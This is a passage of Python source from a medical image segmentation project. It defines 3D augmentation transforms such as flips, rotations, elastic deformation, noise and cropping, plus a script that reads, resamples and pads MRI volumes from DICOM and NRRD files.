np.random.RandomState(seed) def do_transform(self, prob): ## 随机一个概率,当这个概率小于prob的时候,便去进行变换。 prob = min(max(prob, 0.0), 1.0) return self.R.rand() < prob class BorderPad: """ Pad the input data by adding specified borders to every dimension. Args: spatial_border: specified size for every spatial border. Any -ve values will be set to 0. It can be 3 shapes: - single int number, pad all the borders with the same size. - length equals the length of image shape, pad every spatial dimension separately. for example, image shape(CHW) is [1, 4, 4], spatial_border is [2, 1], pad every border of H dim with 2, pad every border of W dim with 1, result shape is [1, 8, 6]. - length equals 2 x (length of image shape), pad every border of every dimension separately. for example, image shape(CHW) is [1, 4, 4], spatial_border is [1, 2, 3, 4], pad top of H dim with 1, pad bottom of H dim with 2, pad left of W dim with 3, pad right of W dim with 4. the result shape is [1, 7, 11]. mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``, ``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``} available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}. One of the listed string values or a user supplied function. Defaults to ``"constant"``. See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html kwargs: other arguments for the `np.pad` or `torch.pad` function. note that `np.pad` treats channel dimension as the first dimension. """ def __init__( self, spatial_border: Union[Sequence[int], int], mode = "constant", **kwargs, ) -> None: self.spatial_border = spatial_border self.mode = mode self.kwargs = kwargs def __call__( self, img, mode = None ): """ Args: img: data to be transformed, assuming `img` is channel-first and padding doesn't apply to the channel dim. mode: available modes for numpy array:{``"constant"``, ``"edge"``, ``"linear_ramp"``, ``"maximum"``, ``"mean"``, ``"median"``, ``"minimum"``, ``"reflect"``, ``"symmetric"``, ``"wrap"``, ``"empty"``} available modes for PyTorch Tensor: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``}. One of the listed string values or a user supplied function. Defaults to `self.mode`. See also: https://numpy.org/doc/1.18/reference/generated/numpy.pad.html https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html Raises: ValueError: When ``self.spatial_border`` does not contain ints. ValueError: When ``self.spatial_border`` length is not one of [1, len(spatial_shape), 2*len(spatial_shape)]. """ spatial_shape = img.shape[1:] spatial_border = self.spatial_border if not all(isinstance(b, int) for b in spatial_border): raise ValueError(f"self.spatial_border must contain only ints, got {spatial_border}.") spatial_border = tuple(max(0, b) for b in spatial_border) if len(spatial_border) == 1: data_pad_width = [(spatial_border[0], spatial_border[0]) for _ in spatial_shape] elif len(spatial_border) == len(spatial_shape): data_pad_width = [(sp, sp) for sp in spatial_border[: len(spatial_shape)]] elif len(spatial_border) == len(spatial_shape) * 2: data_pad_width = [(spatial_border[2 * i], spatial_border[2 * i + 1]) for i in range(len(spatial_shape))] else: raise ValueError( f"Unsupported spatial_border length: {len(spatial_border)}, available options are " f"[1, len(spatial_shape)={len(spatial_shape)}, 2*len(spatial_shape)={2*len(spatial_shape)}]." ) all_pad_width = [(0, 0)] + data_pad_width padder = Pad(all_pad_width, mode or self.mode, **self.kwargs) return padder(img) def map_spatial_axes( img_ndim: int, spatial_axes=None, channel_first=True, ) -> List[int]: """ Utility to map the spatial axes to real axes in channel first/last shape. For example: If `channel_first` is True, and `img` has 3 spatial dims, map spatial axes to real axes as below: None -> [1, 2, 3] [0, 1] -> [1, 2] [0, -1] -> [1, -1] If `channel_first` is False, and `img` has 3 spatial dims, map spatial axes to real axes as below: None -> [0, 1, 2] [0, 1] -> [0, 1] [0, -1] -> [0, -2] Args: img_ndim: dimension number of the target image. spatial_axes: spatial axes to be converted, default is None. The default `None` will convert to all the spatial axes of the image. If axis is negative it counts from the last to the first axis. If axis is a tuple of ints. channel_first: the image data is channel first or channel last, default to channel first. """ if spatial_axes is None: spatial_axes_ = list(range(1, img_ndim) if channel_first else range(img_ndim - 1)) else: spatial_axes_ = [] for a in spatial_axes: if channel_first: spatial_axes_.append(a if a < 0 else a + 1) else: spatial_axes_.append(a - 1 if a < 0 else a) return spatial_axes_ class RandomFlip(): """ Reverses the order of elements along the given spatial axis. Preserves shape. Uses ``np.flip`` in practice. See numpy.flip for additional details: https://docs.scipy.org/doc/numpy/reference/generated/numpy.flip.html. Args: spatial_axis: spatial axes along which to flip over. Default is None. The default `axis=None` will flip over all of the axes of the input array. If axis is negative it counts from the last to the first axis. If axis is a tuple of ints, flipping is performed on all of the axes specified in the tuple. """ def __init__(self, random_state, spatial_axis = None, execution_probability=0.2): self.spatial_axis = spatial_axis self.random_state = random_state self.execution_probability = execution_probability def __call__(self, img: np.ndarray, label: np.ndarray = None) -> np.ndarray: """ Args: img: channel first array, must have shape: (num_channels, H[, W, ..., ]), """ if self.random_state.uniform() > self.execution_probability: ## 不去做变换 return img, label result: np.ndarray = np.flip(img, map_spatial_axes(img.ndim, self.spatial_axis)) if label is not None : if len(label.shape) == 3: # 说明通道维度没有 label = np.expand_dims(label, axis=0) label = np.flip(label, map_spatial_axes(label.ndim, self.spatial_axis)) label = np.squeeze(label, axis=0) elif len(label.shape) == 4: label = np.flip(label, map_spatial_axes(label.ndim, self.spatial_axis)) else : raise "label shape err" return result.astype(img.dtype), label.astype(label.dtype) return result.astype(img.dtype) class RandomRotate90: def __init__(self, random_state, execution_probability=0.2): self.random_state = random_state self.axis = (1, 2) self.execution_probability = execution_probability def __call__(self, m, label=None): assert m.ndim in [3, 4], 'Supports only 3D (DxHxW) or 4D (CxDxHxW) images' k = self.random_state.randint(0, 4) # rotate k times around a given plane assert m.ndim == 4, "输入必须为3d图像,第一个维度为channel" if self.random_state.uniform() < self.execution_probability: channels = [np.rot90(m[c], k, self.axis) for c in range(m.shape[0])] m = np.stack(channels, axis=0) if label is not None : assert label.ndim == 3, "label shape 必须为三维" label = np.rot90(label, k, self.axis) return m, label class RandomRotate: """ Rotate an array by a random degrees from taken from (-angle_spectrum, angle_spectrum) interval. Rotation axis is picked at random from the list of provided axes. """ def __init__(self, random_state, angle_spectrum=30, axes=None, mode='reflect', order=0, execution_probability=0.2): if axes is None: axes = [[2, 1]] # 这样就是以后两个维度为平面进行旋转。 第一个维度是深度 self.random_state = random_state self.angle_spectrum = angle_spectrum self.axes = axes self.execution_probability = execution_probability self.mode = mode self.order = order def __call__(self, m, label=None): if self.random_state.uniform() < self.execution_probability: axis = self.axes[self.random_state.randint(len(self.axes))] angle = self.random_state.randint(-self.angle_spectrum, self.angle_spectrum) assert m.ndim == 4, "输入必须为3d图像,第一个维度为channel" channels = [rotate(m[c], angle, axes=axis, reshape=False, order=self.order, mode=self.mode, cval=-1) for c in range(m.shape[0])] m = np.stack(channels, axis=0) if label is not None : assert label.ndim == 3, "label shape 必须为三维" label = rotate(label, angle, axes=axis, reshape=False, order=self.order, mode="nearest", cval=-1) return m, label class Elatic: def __init__(self, random_state, alpha=(0., 900.), sigma=(9., 13.), scale=(0.85, 1.25), order_seg=1, order_data=3, border_mode_seg="constant", border_cval_seg=0, execution_probability=0.2) -> None: self.random_state = random_state self.alpha = alpha self.sigma = sigma self.scale = scale self.order_seg = order_seg self.order_data = order_data self.border_mode_seg = border_mode_seg self.border_cval_seg = border_cval_seg self.execution_probability = execution_probability def _do_elastic(self, m, seg=None): a = self.random_state.uniform(self.alpha[0], self.alpha[1]) s = self.random_state.uniform(self.sigma[0], self.sigma[1]) patch_size = m.shape[1:] coords = create_zero_centered_coordinate_mesh(patch_size) coords = elastic_deform_coordinates(coords, a, s, self.random_state) dim = 3 seg_result = None if seg is not None: seg_result = np.zeros((patch_size[0], patch_size[1], patch_size[2]), dtype=np.float32) data_result = np.zeros((m.shape[0], patch_size[0], patch_size[1], patch_size[2]), dtype=np.float32) for d in range(dim): ctr = m.shape[d + 1] / 2. - 0.5 coords[d] += ctr if self.scale[0] < 1: sc = self.random_state.uniform(self.scale[0], 1) else : sc = self.random_state.uniform(max(self.scale[0], 1), self.scale[1]) coords = scale_coords(coords, sc) for channel_id in range(m.shape[0]): data_result[channel_id] = interpolate_img(m[channel_id], coords, self.order_data, cval=0.0, is_seg=False) if seg is not None: seg_result = interpolate_img(seg, coords, self.order_seg, self.border_mode_seg, cval=self.border_cval_seg, is_seg=True) return data_result, seg_result def __call__(self, m, seg=None): assert len(m.shape) == 4, "image dim 必须为4" if self.random_state.uniform() < self.execution_probability: m, seg = self._do_elastic(m, seg=seg) if seg is not None : return m, seg else : return m class Standardize: """ Apply Z-score normalization to a given input tensor, i.e. re-scaling the values to be 0-mean and 1-std. Mean and std parameter have to be provided explicitly. """ def __init__(self, a_min, a_max, b_min=0, b_max=1, eps=1e-6, clip=True): self.a_min = a_min self.a_max = a_max self.b_min = b_min self.b_max = b_max self.eps = eps self.clip = clip def __call__(self, m): img = (m - self.a_min) / (self.a_max - self.a_min) if self.clip: img = np.clip(img, self.b_min, self.b_max) return img class Normalization(): def __init__(self, channel_wise=False): pass self.channel_wise = channel_wise def __call__(self, m): assert len(m.shape) == 4, "image shape err" if not self.channel_wise: m = (m - m.mean()) / m.std() else : for i, d in enumerate(m): slices = d != 0 _sub = d[slices].mean() _div = d[slices].std() m[i][slices] = (m[i][slices] - _sub) / (_div+1e-8) return m class AdditiveGaussianNoise: def __init__(self, random_state, scale=(0.0, 0.2), execution_probability=0.2): self.execution_probability = execution_probability self.random_state = random_state self.scale = scale def __call__(self, m): if self.random_state.uniform() < self.execution_probability: std = self.random_state.uniform(self.scale[0], self.scale[1]) gaussian_noise = self.random_state.normal(0, std, size=m.shape) return m + gaussian_noise return m class AdditivePoissonNoise: def __init__(self, random_state, lam=(0.0, 0.2), execution_probability=0.2): self.execution_probability = execution_probability self.random_state = random_state self.lam = lam def __call__(self, m): if self.random_state.rand() < self.execution_probability: lam = self.random_state.uniform(self.lam[0], self.lam[1]) poisson_noise = self.random_state.poisson(lam, size=m.shape) return m + poisson_noise return m class SpatialCrop: """ General purpose cropper to produce sub-volume region of interest (ROI). If a dimension of the expected ROI size is bigger than the input image size, will not crop that dimension. So the cropped result may be smaller than the expected ROI, and the cropped results of several images may not have exactly the same shape. It can support to crop ND spatial (channel-first) data. The cropped region can be parameterised in various ways: - a list of slices for each spatial dimension (allows for use of -ve indexing and `None`) - a spatial center and size - the start and end coordinates of the ROI """ def __init__( self, roi_center: Union[Sequence[int], np.ndarray, None] = None, roi_size: Union[Sequence[int], np.ndarray, None] = None, roi_start: Union[Sequence[int], np.ndarray, None] = None, roi_end: Union[Sequence[int], np.ndarray, None] = None, ) -> None: """ Args: roi_center: voxel coordinates for center of the crop ROI. roi_size: size of the crop ROI, if a dimension of ROI size is bigger than image size, will not crop that dimension of the image. roi_start: voxel coordinates for start of the crop ROI. roi_end: voxel coordinates for end of the crop ROI, if a coordinate is out of image, use the end coordinate of image. roi_slices: list of slices for each of the spatial dimensions. """ if roi_center is not None and roi_size is not None: roi_center = np.asarray(roi_center, dtype=np.int16) roi_size = np.asarray(roi_size, dtype=np.int16) roi_start_np = np.maximum(roi_center - np.floor_divide(roi_size, 2), 0) roi_end_np = np.maximum(roi_start_np + roi_size, roi_start_np) else: if roi_start is None or roi_end is None: raise ValueError("Please specify either roi_center, roi_size or roi_start, roi_end.") roi_start_np = np.maximum(np.asarray(roi_start, dtype=np.int16), 0) roi_end_np = np.maximum(np.asarray(roi_end, dtype=np.int16), roi_start_np) # Allow for 1D by converting back to np.array (since np.maximum will convert to int) roi_start_np = roi_start_np if isinstance(roi_start_np, np.ndarray) else np.array([roi_start_np]) roi_end_np = roi_end_np if isinstance(roi_end_np, np.ndarray) else np.array([roi_end_np]) # convert to slices self.slices = [slice(s, e) for s, e in zip(roi_start_np, roi_end_np)] def __call__(self, img: Union[np.ndarray, torch.Tensor]): """ Apply the transform to `img`, assuming `img` is channel-first and slicing doesn't apply to the channel dim. """ sd = min(len(self.slices), len(img.shape[1:])) # spatial dims slices = [slice(None)] + self.slices[:sd] return img[tuple(slices)] class CenterSpatialCrop: """ Crop at the center of image with specified ROI size. If a dimension of the expected ROI size is bigger than the input image size, will not crop that dimension. So the cropped result may be smaller than the expected ROI, and the cropped results of several images may not have exactly the same shape. Args: roi_size: the spatial size of the crop region e.g. [224,224,128] if a dimension of ROI size is bigger than image size, will not crop that dimension of the image. If its components have non-positive values, the corresponding size of input image will be used. for example: if the spatial size of input data is [40, 40, 40] and `roi_size=[32, 64, -1]`, the spatial size of output data will be [32, 40, 40]. """ def __init__(self, roi_size: Union[Sequence[int], int]) -> None: self.roi_size = roi_size def __call__(self, img: np.ndarray): """ Apply the transform to `img`, assuming `img` is channel-first and slicing doesn't apply to the channel dim. """ assert img.ndim == 4, "img ndim 必须为4, (channel, W, H, D)" center = [i // 2 for i in img.shape[1:]] cropper = SpatialCrop(roi_center=center, roi_size=self.roi_size) return cropper(img) def map_binary_to_indices( label: np.ndarray, image: Optional[np.ndarray] = None, image_threshold: float = 0.0, ) -> Tuple[np.ndarray, np.ndarray]: """ Compute the foreground and background of input label data, return the indices after fattening. For example: ``label = np.array([[[0, 1, 1], [1, 0, 1], [1, 1, 0]]])`` ``foreground indices = np.array([1, 2, 3, 5, 6, 7])`` and ``background indices = np.array([0, 4, 8])`` Args: label: use the label data to get the foreground/background information. image: if image is not None, use ``label = 0 & image > image_threshold`` to define background. so the output items will not map to all the voxels in the label. image_threshold: if enabled `image`, use ``image > image_threshold`` to determine the valid image content area and select background only in this area. """ # Prepare fg/bg indices if label.shape[0] > 1: label = label[1:] # for One-Hot format data, remove the background channel label_flat = np.any(label, axis=0).ravel() # in case label has multiple dimensions fg_indices = np.nonzero(label_flat)[0] if image is not None: img_flat = np.any(image > image_threshold, axis=0).ravel() bg_indices = np.nonzero(np.logical_and(img_flat, ~label_flat))[0] else: bg_indices = np.nonzero(~label_flat)[0] return fg_indices, bg_indices class RandCropByPosNegLabel: """ Crop random fixed sized regions with the center being a foreground or background voxel based on the Pos Neg Ratio. And will return a list of arrays for all the cropped images. For example, crop two (3 x 3) arrays from (5 x 5) array with pos/neg=1:: [[[0, 0, 0, 0, 0], [0, 1, 2, 1, 0], [[0, 1, 2], [[2, 1, 0], [0, 1, 3, 0, 0], --> [0, 1, 3], [3, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0]] [0, 0, 0]] [0, 0, 0, 0, 0]]] If a dimension of the expected spatial size is bigger than the input image size, will not crop that dimension. So the cropped result may be smaller than expected size, and the cropped results of several images may not have exactly same shape. Args: spatial_size: the spatial size of the crop region e.g. [224, 224, 128]. if a dimension of ROI size is bigger than image size, will not crop that dimension of the image. if its components have non-positive values, the corresponding size of `label` will be used. for example: if the spatial size of input data is [40, 40, 40] and `spatial_size=[32, 64, -1]`, the spatial size of output data will be [32, 40, 40]. label: the label image that is used for finding foreground/background, if None, must set at `self.__call__`. Non-zero indicates foreground, zero indicates background. pos: used with `neg` together to calculate the ratio ``pos / (pos + neg)`` for the probability to pick a foreground voxel as a center rather than a background voxel. neg: used with `pos` together to calculate the ratio ``pos / (pos + neg)`` for the probability to pick a foreground voxel as a center rather than a background voxel. num_samples: number of samples (crop regions) to take in each list. image: optional image data to help select valid area, can be same as `img` or another image array. if not None, use ``label == 0 & image > image_threshold`` to select the negative sample (background) center. So the crop center will only come from the valid image areas. image_threshold: if enabled `image`, use ``image > image_threshold`` to determine the valid image content areas. fg_indices: if provided pre-computed foreground indices of `label`, will ignore above `image` and `image_threshold`, and randomly select crop centers based on them, need to provide `fg_indices` and `bg_indices` together, expect to be 1 dim array of spatial indices after flattening. a typical usage is to call `FgBgToIndices` transform first and cache the results. bg_indices: if provided pre-computed background indices of `label`, will ignore above `image` and `image_threshold`, and randomly select crop centers based on them, need to provide `fg_indices` and `bg_indices` together, expect to be 1 dim array of spatial indices after flattening. a typical usage is to call `FgBgToIndices` transform first and cache the results. Raises: ValueError: When ``pos`` or ``neg`` are negative. ValueError: When ``pos=0`` and ``neg=0``. Incompatible values. """ def __init__( self, spatial_size: Union[Sequence[int], int], label: Optional[np.ndarray] = None, pos: float = 1.0, neg: float = 1.0, num_samples: int = 1, image: Optional[np.ndarray] = None, image_threshold: float = 0.0, random_state: np.random.RandomState = None, ) -> None: self.spatial_size = spatial_size self.label = label if pos < 0 or neg < 0: raise ValueError(f"pos and neg must be nonnegative, got pos={pos} neg={neg}.") if pos + neg == 0: raise ValueError("Incompatible values: pos=0 and neg=0.") self.pos_ratio = pos / (pos + neg) self.num_samples = num_samples self.image = image self.image_threshold = image_threshold self.centers: Optional[List[List[np.ndarray]]] = None self.random_state = random_state def randomize( self, label: np.ndarray, image: Optional[np.ndarray] = None, ) -> None: self.spatial_size = self.spatial_size fg_indices_, bg_indices_ = map_binary_to_indices(label, image, self.image_threshold) self.centers = generate_pos_neg_label_crop_centers( self.spatial_size, self.num_samples, self.pos_ratio, label.shape[1:], fg_indices_, bg_indices_, rand_state=self.random_state ) def __call__( self, img: np.ndarray, label: Optional[np.ndarray] = None, image: Optional[np.ndarray] = None, is_label = False, ) -> List[np.ndarray]: """ Args: img: input data to crop samples from based on the pos/neg ratio of `label` and `image`. Assumes `img` is a channel-first array. label: the label image that is used for finding foreground/background, if None, use `self.label`. image: optional image data to help select valid area, can be same as `img` or another image array. use ``label == 0 & image > image_threshold`` to select the negative sample(background) center. so the crop center will only exist on valid image area. if None, use `self.image`. fg_indices: foreground indices to randomly select crop centers, need to provide `fg_indices` and `bg_indices` together. bg_indices: background indices to randomly select crop centers, need to provide `fg_indices` and `bg_indices` together. """ if label is None: label = self.label if label is None: raise ValueError("label should be provided.") if len(label.shape) == 3: label = np.expand_dims(label, axis=0) if image is None: image = self.image if not is_label: self.randomize(label, image) else : if len(img.shape) == 3: img = np.expand_dims(img, axis=0) results: List[np.ndarray] = [] if self.centers is not None: for center in self.centers: cropper = SpatialCrop(roi_center=tuple(center), roi_size=self.spatial_size) # type: ignore r = cropper(img) if is_label: if len(r.shape) == 4: r = np.squeeze(r, axis=0) results.append(r) return results class Normalize: """ Apply simple min-max scaling to a given input tensor, i.e. shrinks the range of the data in a fixed range of [-1, 1]. """ def __init__(self, min_value, max_value): assert max_value > min_value self.min_value = min_value self.value_range = max_value - min_value def __call__(self, m): norm_0_1 = (m - self.min_value) / self.value_range return np.clip(2 * norm_0_1 - 1, -1, 1) class GammaTransformer: def __init__(self, random_state, gamma_range=(0.5, 2), epsilon=1e-7, per_channel=False, retain_stats: Union[bool, Callable[[], bool]] = False, execution_probability=0.2) -> None: self.gamma_range = gamma_range self.epsilon = epsilon self.per_channel = per_channel self.retain_stats = retain_stats self.execution_probability = execution_probability self.random_state = random_state def __call__(self, m): if self.random_state.uniform() < self.execution_probability: m = augment_gamma(m, gamma_range=self.gamma_range, epsilon=self.epsilon, per_channel=self.per_channel, retain_stats=self.retain_stats) return m class MirrorTransform: """ Randomly mirrors data along specified axes. Mirroring is evenly distributed. Probability of mirroring along each axis is 0.5 Args: axes (tuple of int): axes along which to mirror """ def __init__(self, random_state, axes=(0, 1, 2), execution_probability=0.2): self.execution_probability = execution_probability self.random_state = random_state self.axes = axes if max(axes) > 2: raise ValueError("MirrorTransform now takes the axes as the spatial dimensions. What previously was " "axes=(2, 3, 4) to mirror along all spatial dimensions of a 5d tensor (b, c, x, y, z) " "is now axes=(0, 1, 2). Please adapt your scripts accordingly.") def __call__(self, data, seg=None): if self.random_state.uniform() < self.execution_probability: ret_val = augment_mirroring(data, self.random_state, sample_seg=seg, axes=self.axes) data = ret_val[0] if seg is not None: seg = ret_val[1] return data, seg # if __name__ == "__main__": # print("数据增强函数测试") # r = Random(seed=8) # print(r.do_transform(0.5)) # print(r.do_transform(0.5)) # print(r.do_transform(0.5)) # print(r.do_transform(0.5)) # f = RandomFlip(r.R) # image = h5py.File("./BAI_YUE_BIN_data.h5", "r") # single_model_image = image["image"][:1] # label = image["label"][0] # print(f"label shape is {label.shape}") # print(single_model_image.shape) # sd = Standardize(a_min=single_model_image.min(), a_max=single_model_image.max()) # single_model_image = sd(single_model_image) # print("归一化变换") # plot_3d(single_model_image) # plot_3d_label(label) # # print("随机翻转变换") # # single_model_image, label = f(single_model_image, label) # # plot_3d(single_model_image) # # plot_3d_label(label) # # print("随机旋转变换") # # ro = RandomRotate(random_state=r.R) # # single_model_image, label = ro(single_model_image, label) # # print(single_model_image.shape) # # plot_3d(single_model_image) # # plot_3d_label(label) # # print("添加高斯噪声") # # gn = AdditiveGaussianNoise(r.R) # # single_model_image = gn(single_model_image) # # plot_3d(single_model_image) # print("添加柏松噪声") # pn = AdditivePoissonNoise(r.R) # single_model_image = pn(single_model_image) # plot_3d(single_model_image) ``` #### File: MedicalSeg/test/spacing_resize_h5.py ```python import SimpleITK as sitk import os import h5py import numpy as np import matplotlib.pyplot as plt from PIL import Image from scipy import ndimage import zipfile img_size = (288, 288) t1_d = {} t2f_d = {} t1_mask = {} t2f_mask = {} image_shapes = [] def padding_image_array_size(image_array, out_size): img_z, img_x, img_y = image_array.shape[0], image_array.shape[1], image_array.shape[2] out_z, out_x, out_y = out_size[0], out_size[1], out_size[2] if out_z > img_z: z_up = int((out_z - img_z) / 2) z_down = out_z - img_z - z_up if out_x >= img_x and out_y >= img_y: # 三个维度都是padding x_up = int((out_x - img_x) / 2) x_down = out_x - img_x - x_up y_up = int((out_y - img_y) / 2) y_down = out_y - img_y - y_up new_volume = np.pad(image_array, ((z_up, z_down), (x_up, x_down), (y_up, y_down)), mode='constant') else: new_volume = np.pad(image_array, (z_up, z_down), mode='constant') new_volume = img_center_crop(new_volume, (24, 256, 256)) else: # 把z轴crop为32 z_start = int((out_z - img_z) / 2) image_array = image_array[z_start: z_start + out_size[0], :, :] if out_x >= img_x and out_y >= img_y: # 三个维度都是padding x_up = int((out_x - img_x) / 2) x_down = out_x - img_x - x_up y_up = int((out_y - img_y) / 2) y_down = out_y - img_y - y_up new_volume = np.pad(image_array, ((0, 0), (x_up, x_down), (y_up, y_down)), mode='constant') else: new_volume = img_center_crop(image_array, (24, 256, 256)) return new_volume def resample_image(itk_image, out_spacing=(1.0, 1.0, 1.0), is_label=False): original_spacing = itk_image.GetSpacing() original_size = itk_image.GetSize() out_size = [int(np.round(original_size[0] * (original_spacing[0] / out_spacing[0]))), int(np.round(original_size[1] * (original_spacing[1] / out_spacing[1]))), int(np.round(original_size[2] * (original_spacing[2] / out_spacing[2])))] resample = sitk.ResampleImageFilter() resample.SetOutputSpacing(out_spacing) resample.SetSize(out_size) resample.SetOutputDirection(itk_image.GetDirection()) resample.SetOutputOrigin(itk_image.GetOrigin()) resample.SetTransform(sitk.Transform()) resample.SetDefaultPixelValue(itk_image.GetPixelIDValue()) if is_label: resample.SetInterpolator(sitk.sitkNearestNeighbor) else: resample.SetInterpolator(sitk.sitkBSpline) return resample.Execute(itk_image) def _get_affine(img): """ Get or construct the affine matrix of the image, it can be used to correct spacing, orientation or execute spatial transforms. Construct Affine matrix based on direction, spacing, origin information. Refer to: https://github.com/RSIP-Vision/medio Args: img: a ITK image object loaded from a image file. """ # print(img.GetDirection()) direction = img.GetDirection() spacing = np.asarray(img.GetSpacing()) origin = np.asarray(img.GetOrigin()) direction = np.asarray(direction) affine = np.eye(direction.shape[0] + 1) affine[(slice(-1), slice(-1))] = direction @ np.diag(spacing) affine[(slice(-1), -1)] = origin return affine def img_center_crop(image, crop_size): assert len(image.shape) == 3, 'invalid image size in sliding window' cropping = [] z_start, x_start, y_start = 0, 0, 0 img_z, img_x, img_y = image.shape[0], image.shape[1], image.shape[2] crop_z, crop_x, crop_y = crop_size[0], crop_size[1], crop_size[2] # x or y 一个比crop大 或者两个都大 if img_x > crop_x and img_y > crop_y: starting = [int((crop_z - img_z) / 2), int((img_x - crop_x) / 2), int((img_y - crop_y) / 2)] z_start, x_start, y_start = starting[0], starting[1], starting[2] elif img_x > crop_x and img_y <= crop_y: starting = [int((crop_z - img_z) / 2), int((img_x - crop_x) / 2), int((crop_y - img_y) / 2)] z_start, x_start, y_start = starting[0], starting[1], 0 y_up = int((crop_y - img_y) / 2) y_down = crop_y - img_y - y_up image = np.pad(image, ((0, 0), (0, 0), (y_up, y_down)), mode='constant') elif img_x <= crop_x and img_y > crop_y: starting = [int((crop_z - img_z) / 2), int((crop_x - img_x) / 2), int((img_y - crop_y) / 2)] z_start, x_start, y_start = starting[0], 0, starting[2] x_up = int((crop_x - img_x) / 2) x_down = crop_x - img_x - x_up image = np.pad(image, ((0, 0), (x_up, x_down), (0, 0)), mode='constant') img_crop = image[z_start: z_start + crop_size[0], x_start:x_start + crop_size[1], y_start: y_start + crop_size[2]] return img_crop def resample_image_array_size(image_array, out_size, order=3): #Bilinear interpolation would be order=1, # nearest is order=0, # and cubic is the default (order=3). real_resize = np.array(out_size) / image_array.shape new_volume = ndimage.zoom(image_array, zoom=real_resize, order=order) return new_volume def read_data(dir): index = 0 for each_patient_dir in os.listdir(dir): if dir[-1] != "/": dir += "/" if each_patient_dir[0] == ".": continue patient_path = dir + each_patient_dir if not os.path.isdir(patient_path): continue reader = sitk.ImageSeriesReader() series_ids = reader.GetGDCMSeriesIDs(patient_path) # print(series_ids) # 拿到了序列id以后呢 t1_series = "" fl_series = "" nrrd_t1_data = "" nrrd_fl_data = "" for each_path in os.listdir(patient_path): if patient_path[-1] != "/": patient_path += "/" # print(each_path) if os.path.isdir(patient_path + each_path) and each_path[0] != ".": # 说明找到那个文件夹了 dir1 = patient_path + each_path + "/" print(dir1) for series_id_dir in os.listdir(dir1): if os.path.exists(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd.zip") and not os.path.exists(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd"): # 先进行解压 zFile = zipfile.ZipFile(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd.zip", "r") for fileM in zFile.namelist(): zFile.extract(fileM, dir1 + series_id_dir + "/") zFile.close() # 说明找到了t1 序列 t1_series = series_id_dir nrrd_t1_data = sitk.ReadImage(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd") print("找到了t1序列label" + str(sitk.GetArrayFromImage(nrrd_t1_data).shape)) # nrrd_t1_data, nrrd_options = nrrd.read(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd") elif os.path.exists(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd"): # 说明找到了t1 序列 t1_series = series_id_dir nrrd_t1_data = sitk.ReadImage(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd") print("找到了t1序列label" + str(sitk.GetArrayFromImage(nrrd_t1_data).shape)) elif os.path.exists(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd.zip") and not os.path.exists(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd"): # 先进行解压 zFile = zipfile.ZipFile(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd.zip", "r") for fileM in zFile.namelist(): zFile.extract(fileM, dir1 + series_id_dir + "/") zFile.close() # 说明找到了t2 序列 t1_series = series_id_dir nrrd_fl_data = sitk.ReadImage(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd") print("找到了t2序列label" + str(sitk.GetArrayFromImage(nrrd_fl_data).shape)) elif os.path.exists(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd"): # 找到了flare 序列 fl_series = series_id_dir nrrd_fl_data = sitk.ReadImage(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd") print("找到了t2序列label" + str(sitk.GetArrayFromImage(nrrd_fl_data).shape)) # nrrd_fl_data, nrrd_options = nrrd.read(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd") # print(nrrd_options) ## 序列的话,看了下 一共五个序列,但是应该是只用1号和4号 这两个序列 dicom_series_t1 = reader.GetGDCMSeriesFileNames(patient_path, t1_series) # file = sitk.ReadImage(patient_path) reader.SetFileNames(dicom_series_t1) img_t1 = reader.Execute() img_array_t1 = sitk.GetArrayFromImage(img_t1) # print("t1 series: " + str(img_array_t1.shape)) # print("t1 label is {}".format(nrrd_t1_data.shape)) dicom_series_fl = reader.GetGDCMSeriesFileNames(patient_path, fl_series) reader.SetFileNames(dicom_series_fl) img_fl = reader.Execute() space_fl = img_fl.GetSpacing() img_array_fl = sitk.GetArrayFromImage(img_fl) if nrrd_t1_data == "": print("此人无t1序列 跳过") continue # print(nrrd_t1_data.shape) # num = len(img_array_t1) # num_fl = len(img_array_fl) # num = min(num, num_fl) # if "CHEN_SHA_LIN" in dir1: # img_array_t1 = resample_image_array_size(img_array_t1, out_size=(32, 256, 256), order=3) # img_array_fl = resample_image_array_size(img_array_fl, out_size=(32, 256, 256), order=3) # nrrd_t1_data = resample_image_array_size(nrrd_t1_data, out_size=(32, 256, 256), order=1) # nrrd_fl_data = resample_image_array_size(nrrd_fl_data, out_size=(32, 256, 256), order=1) # print(np.unique(nrrd_t1_data)) # for k in range(2, 30): # plt.subplot(2, 2, 1) # plt.imshow(img_array_t1[k], cmap="gray") # plt.subplot(2, 2, 2) # plt.imshow(nrrd_t1_data[k], cmap="gray") # plt.subplot(2, 2, 3) # plt.imshow(img_array_fl[k], cmap="gray") # plt.subplot(2, 2, 4) # plt.imshow(nrrd_fl_data[k], cmap="gray") # plt.show() # print("t2_flare series: " + str(img_array_fl.shape)) # print("fl label is {}".format(nrrd_fl_data.shape)) # os._exit(0) resampled_image = resample_image(img_t1, (1., 1., 6.5)) # itk_image.GetSize (x,y,z) resampled_image = sitk.GetArrayFromImage(resampled_image) # GetArrayFromImage (z,x,y) image_resample_t1 = padding_image_array_size(resampled_image, out_size=(24, 256, 256)) # print(each_patient_dir) # print(image_resample_t1.shape) resampled_image = resample_image(img_fl, (1., 1., 6.5)) # itk_image.GetSize (x,y,z) resampled_image = sitk.GetArrayFromImage(resampled_image) # GetArrayFromImage 